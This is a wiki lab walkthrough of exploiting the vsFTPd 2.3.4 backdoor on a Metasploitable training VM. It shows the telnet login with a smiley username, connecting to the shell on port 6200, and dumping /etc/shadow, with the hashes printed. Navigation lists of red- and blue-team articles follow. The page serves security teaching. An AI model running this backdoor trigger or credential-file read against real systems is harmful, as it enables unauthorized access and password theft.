Metasploitable/VSFTP

From charlesreid1

The Background

VSFPT is an ftp server program. The particular version of VSFTP included on the Metasploitable virtual machine contains a vulnerability that opens a backdoor shell.

If a client attempts to connect using a username that ends in a smiley :), it opens a backdoor shell listening on port 6200. (Kind of like 2600 - get it?)

Backdoor

Opening Backdoor

The procedure for opening a backdoor on port 6200 with VSFTP is as follows:

We begin by scanning the Metasploitable virtual machine at 10.0.0.27, to show that port 6200 is closed: 

root@morpheus:~# nmap -sS -p 6200 10.0.0.27

Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-25 07:33 PDT
Nmap scan report for 10.0.0.27
Host is up (0.00077s latency).
PORT     STATE  SERVICE
6200/tcp closed unknown
MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.25 seconds

Now, in another window, we open the backdoor: 

root@morpheus:~# telnet 10.0.0.27 21
Trying 10.0.0.27...
Connected to 10.0.0.27.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
user backdoored:)
331 Please specify the password.
pass doesnotmatter

You can close that window - you're done with it.

Now take a look at the same port 6200 with nmap: 

root@morpheus:~# nmap -sS -p 6200 10.0.0.27

Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-25 07:34 PDT
Nmap scan report for 10.0.0.27
Host is up (0.0010s latency).
PORT     STATE SERVICE
6200/tcp open  unknown
MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds

Utilizing Backdoor

To utilize the backdoor, connect to port 6200 with a telnet client.

Then you can execute shell commands by running command_name args; then press enter.

For example, to dump the contents of the /etc/shadow file: 

# telnet 10.0.0.27 6200
Trying 10.0.0.27...
Connected to 10.0.0.27.
Escape character is '^]'.

ls;
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz


cat /etc/shadow;
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
sync:*:14684:0:99999:7:::
games:*:14684:0:99999:7:::
man:*:14684:0:99999:7:::
lp:*:14684:0:99999:7:::
mail:*:14684:0:99999:7:::
news:*:14684:0:99999:7:::
uucp:*:14684:0:99999:7:::
proxy:*:14684:0:99999:7:::
www-data:*:14684:0:99999:7:::
backup:*:14684:0:99999:7:::
list:*:14684:0:99999:7:::
irc:*:14684:0:99999:7:::
gnats:*:14684:0:99999:7:::
nobody:*:14684:0:99999:7:::
libuuid:!:14684:0:99999:7:::
dhcp:*:14684:0:99999:7:::
syslog:*:14684:0:99999:7:::
klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
sshd:*:14684:0:99999:7:::
msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7:::
bind:*:14685:0:99999:7:::
postfix:*:14685:0:99999:7:::
ftp:*:14685:0:99999:7:::
postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7:::
mysql:!:14685:0:99999:7:::
tomcat55:*:14691:0:99999:7:::
distccd:*:14698:0:99999:7:::
user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
telnetd:*:14715:0:99999:7:::
proftpd:!:14727:0:99999:7:::
statd:*:15474:0:99999:7:::
snmp:*:15480:0:99999:7:::



Defcon.png
Metasploit
any and all resources related to metasploit on this wiki


MSF - on the metasploit framework generally

Category:Metasploit - pages labeled with the "Metasploit" category label

MSF/Wordlists - wordlists that come bundled with Metasploit

MSFVenom - msfvenom is used to craft payloads

Meterpreter - the shell you'll have when you use MSF to craft a remote shell payload.


Category:Security  · Category:Metasploit  · Category:Kali


Flags  · Template:MetasploitFlag  · e





Defcon.png
Metasploitable: The Red Team
Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the RED TEAM's tools and routes of attack.


Metasploitable Databases:

Exploiting MySQL with Metasploit: Metasploitable/MySQL

Exploiting PostgreSQL with Metasploit: Metasploitable/Postgres


Metasploitable Networking:

Exploiting VSFTP Backdoor: Metasploitable/VSFTP

SSH Penetration by Brute Force: Metasploitable/SSH/Brute Force

SSH Penetration with Keys: Metasploitable/SSH/Keys

SSH Penetration with Metasploit: Metasploitable/SSH/Exploits

Brute-Forcing /etc/shadow File: Metasploitable/John Shadow File

Exploiting NFS: Metasploitable/NFS

Exploiting DNS Bind Server: Metasploitable/DNS Bind


Metasploitable Services:

distcc: Metasploitable/distcc


Metasploitable Apache:

Exploiting Apache (with Metasploit): Metasploitable/Apache

Exploiting Apache (with Python): Metasploitable/Apache/Python

Tor's Hammer DoS Attack: Metasploitable/TorsHammer *

Apache DAV: Metasploitable/Apache/DAV *

Apache Tomcat and Coyote: Metasploitable/Apache/Tomcat and Coyote


Metasploitable Memory:

General approach to memory-based attacks: Metasploitable/Memory

Investigating memory data: Metasploitable/Volatile Data Investigation

Dumping Memory from Metasploit: Metasploitable/Dumping Memory


Metasploitable Fuzzing:

(Have not done much work on fuzzing Metasploitable...)

Fuzzing  · American Fuzzy Lop


Category:Security  · Category:Metasploit  · Category:Metasploitable  · Category:Kali


Flags  · Template:MetasploitableRedTeamFlag  · e




Defcon.png
Metasploitablue: The Blue Team
Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the BLUE TEAM's methods for defending Metasploitable: defending against and responding to intrusions.

Hence the name, Metasploita-blue.

Overview: Metasploitable/Defenses

Metasploitable/Defenses/Stopping  · Metasploitable/Defenses/Detecting


Metasploitable On-Machine Defenses:

Linux Volatile Data System Investigation: Metasploitable/Volatile Data Investigation

Linux Artifact Investigation: Metasploitable/Artifact Investigation

Linux Iptables Essentials: Metasploitable/Iptables

Firewall Assurance and Testing: Metasploitable/Firewall

Password Assessment: Metasploitable/Password Assessment

Standard Unix Ports: Unix/Ports


Metasploitable Networking Defenses:

Netcat and Cryptcat (Blue Team): Metasploitable/Netcat and Metasploitable/Cryptcat

Nmap (Blue Team): Metasploitable/Nmap

Network Traffic Analysis: Metasploitable/Network Traffic Analysis

Suspicious Traffic Patterns: Metasploitable/Suspicious Traffic Patterns

Snort IDS: Metasploitable/Snort


Category:Security  · Category:Metasploit  · Category:Metasploitable  · Category:Kali


Flags  · Template:MetasploitableBlueTeamFlag  · e




Defcon.png
Kali Linux
"The quieter you become, the more you are able to hear."

Penetration testing Linux distribution.


Kali  · Category:Kali

Kali/Wireless Reboot


Kali Software:

Kali Tools

Kali Top 10

Aircrack  · Wireshark  · John the Ripper  · Nmap  · Metasploit Framework

Dsniff  · Tcpdump  · Hydra  · Sqlmap  · Burpsuite  · Commix

Dirbuster  · Valgrind


Attack Workflow:

Kali/Workflow

1 Physical Attacks: Kali/Layer 1 Attacks

2 Data/MAC Attacks: Kali/Layer 2 Attacks

3 Network Attacks: Kali/Layer 3 Attacks

4 Transport Attacks: Kali/Layer 4 Attacks

5 Session Attacks: Kali/Layer 5 Attacks

6 Presentation Attacks: Kali/Layer 6 Attacks

7 Application Attacks: Kali/Layer 7 Attacks


Red Team Blue Team

Metasploitable - Red Team

Metasploitable - Blue Team


Networking:

Kali/Hotspot  · Kali/OpenVPN  · Kali/OpenVPN/Hotspot  · Kali/OpenVPN/PIA

Kali/IPv6


Booting:

Kali/Dual Boot OS X  · Kali/Live USB  · Kali/Persistent USB


Installing:

Kali/Installing  · Kali/Post Install  · Kali/Fixes


Kali on Raspberry Pi:

Kali Raspberry Pi  · Kali Raspberry Pi/Installing  · Kali Raspberry Pi/Headless  · Kali Raspberry Pi/Post-Install


Category:Security  · Category:Wireless  · Category:Passwords  · Category:Man in the Middle  · Category:Evil Twin

Flags  · Template:KaliFlag  · e




Retrieved from "https://charlesreid1.com/w/index.php?title=Metasploitable/VSFTP&oldid=9709"